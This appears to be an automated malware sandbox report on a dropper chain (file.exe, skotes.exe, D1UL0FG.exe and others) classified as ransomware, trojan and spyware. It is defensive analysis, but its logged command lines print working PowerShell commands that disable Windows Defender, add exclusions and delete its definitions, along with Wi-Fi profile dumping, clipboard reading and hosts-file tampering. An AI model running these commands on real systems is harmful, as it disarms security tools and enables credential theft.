Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
Source: D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
Source: D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DF30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
Source: Yara match | File source: 81.3.m9sfEU9.exe.31f4800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 85.2.FuturreApp.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 85.2.FuturreApp.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: m9sfEU9.exe PID: 7732, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: FuturreApp.exe PID: 1972, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\FACWLRWHGG.pdfJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\DTBZGIOOSO.jpgJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\DTBZGIOOSO.jpgJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile deleted: C:\Users\user\AppData\Local\Temp\??? ??\Common Files\Desktop\PSAMNLJHZW.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: cmd.exe | Process created: 53

                                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: skotes.exe.0.dr | Static PE information: section name:
Source: skotes.exe.0.dr | Static PE information: section name: .idata
Source: random[1].exe.3.dr | Static PE information: section name:
Source: random[1].exe.3.dr | Static PE information: section name: .idata
Source: random[1].exe.3.dr | Static PE information: section name:
Source: random[3].exe.3.dr | Static PE information: section name:
Source: random[3].exe.3.dr | Static PE information: section name: .idata
Source: random[3].exe.3.dr | Static PE information: section name:
Source: f8645e1e85.exe.3.dr | Static PE information: section name:
Source: f8645e1e85.exe.3.dr | Static PE information: section name: .idata
Source: f8645e1e85.exe.3.dr | Static PE information: section name:
Source: random[3].exe0.3.dr | Static PE information: section name:
Source: random[3].exe0.3.dr | Static PE information: section name: .idata
Source: fde98a8d0b.exe.3.dr | Static PE information: section name:
Source: fde98a8d0b.exe.3.dr | Static PE information: section name: .idata
Source: random[4].exe0.3.dr | Static PE information: section name:
Source: random[4].exe0.3.dr | Static PE information: section name: .idata
Source: random[4].exe0.3.dr | Static PE information: section name:
Source: d188864e84.exe.3.dr | Static PE information: section name:
Source: d188864e84.exe.3.dr | Static PE information: section name: .idata
Source: d188864e84.exe.3.dr | Static PE information: section name:
Source: f7b3852b06.exe.3.dr | Static PE information: section name:
Source: f7b3852b06.exe.3.dr | Static PE information: section name: .idata
Source: f7b3852b06.exe.3.dr | Static PE information: section name:
Source: random[1].exe1.3.dr | Static PE information: section name:
Source: random[1].exe1.3.dr | Static PE information: section name: .idata
Source: random[1].exe1.3.dr | Static PE information: section name:
Source: random[2].exe.3.dr | Static PE information: section name:
Source: random[2].exe.3.dr | Static PE information: section name: .idata
Source: random[2].exe.3.dr | Static PE information: section name:
Source: cb947ba4b8.exe.3.dr | Static PE information: section name:
Source: cb947ba4b8.exe.3.dr | Static PE information: section name: .idata
Source: cb947ba4b8.exe.3.dr | Static PE information: section name:
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006ACB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers
Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\Tasks\skotes.job
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B90E16406_2_00007FF8B90E1640
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B91098DC6_2_00007FF8B91098DC
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B910B4346_2_00007FF8B910B434
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B91056386_2_00007FF8B9105638
                                Source: C:\Users\Public\Netstat\FuturreApp.exe | Process token adjusted: Security
                                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 002780C0 appears 130 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006C8E10 appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006ADF80 appears 64 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006A7A00 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006A80C0 appears 261 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006AD942 appears 85 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006AD663 appears 39 times
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 006AD64E appears 66 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A8753012 appears 50 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8B910DC10 appears 82 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A92E12EE appears 275 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF67AED2910 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A875698D appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF67AED2710 appears 104 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A8752A09 appears 105 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A875405C appears 392 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A87524BE appears 35 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A8754840 appears 74 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A934E055 appears 61 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A8751EF6 appears 866 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A8752739 appears 281 times
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: String function: 00007FF8A934DFBF appears 75 times
                                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: Commandline size = 3647
                                Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
                                Source: random[1].exe0.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: a4439a2887.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: file.exe | Static PE information: Section: ZLIB complexity 0.9983768307220708
                                Source: skotes.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9983768307220708
                                Source: random[1].exe.3.dr | Static PE information: Section: ZLIB complexity 0.9973177975171232
                                Source: random[1].exe.3.dr | Static PE information: Section: uzxdwyvi ZLIB complexity 0.9946595600267777
                                Source: random[3].exe.3.dr | Static PE information: Section: ZLIB complexity 0.9973980629280822
                                Source: random[3].exe.3.dr | Static PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
                                Source: f8645e1e85.exe.3.dr | Static PE information: Section: ZLIB complexity 0.9973980629280822
                                Source: f8645e1e85.exe.3.dr | Static PE information: Section: speiiqif ZLIB complexity 0.9946216844627226
                                Source: random[4].exe0.3.dr | Static PE information: Section: efaooxfi ZLIB complexity 0.9943950236344538
                                Source: d188864e84.exe.3.dr | Static PE information: Section: ZLIB complexity 0.9973177975171232
                                Source: d188864e84.exe.3.dr | Static PE information: Section: uzxdwyvi ZLIB complexity 0.9946595600267777
                                Source: f7b3852b06.exe.3.dr | Static PE information: Section: efaooxfi ZLIB complexity 0.9943950236344538
                                Source: random[1].exe1.3.dr | Static PE information: Section: ZLIB complexity 0.9974582619863014
                                Source: random[1].exe1.3.dr | Static PE information: Section: xnuzvlhe ZLIB complexity 0.994702490860937
                                Source: random[2].exe.3.dr | Static PE information: Section: ZLIB complexity 0.9952793473247232
                                Source: random[2].exe.3.dr | Static PE information: Section: fhxxuwls ZLIB complexity 0.9927186079128777
                                Source: cb947ba4b8.exe.3.dr | Static PE information: Section: ZLIB complexity 0.9952793473247232
                                Source: cb947ba4b8.exe.3.dr | Static PE information: Section: fhxxuwls ZLIB complexity 0.9927186079128777
                                Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instr diversity: 0.5
                                Source: skotes.exe.0.dr | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instr diversity: 0.5
                                Source: 97d4b1071f.exe.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: 97d4b1071f.exe.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: random[4].exe1.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: random[4].exe1.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: random[2].exe0.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                Source: random[2].exe0.3.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                Source: classification engine | Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@187/113@0/14
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exe
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5636:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Mutant created: \Sessions\1\BaseNamedObjects\y
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
                                Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
                                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File read: C:\Windows\System32\drivers\etc\hosts
                                Source: D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: D1UL0FG.exe, 00000006.00000003.2639961783.000001FA2F17F000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2831845470.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2832160533.0000000003B5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3008113833.00007FF8B8281000.00000040.00000001.01000000.00000012.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: file.exe | ReversingLabs: Detection: 47%
                                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: D1UL0FG.exe | String found in binary or memory: set-addPolicy
                                Source: D1UL0FG.exe | String found in binary or memory: id-cmc-addExtensions
                                Source: D1UL0FG.exe | String found in binary or memory: can't send non-None value to a just-started generator
                                Source: D1UL0FG.exe | String found in binary or memory: --help
                                Source: D1UL0FG.exe | String found in binary or memory: --help
                                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                                Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
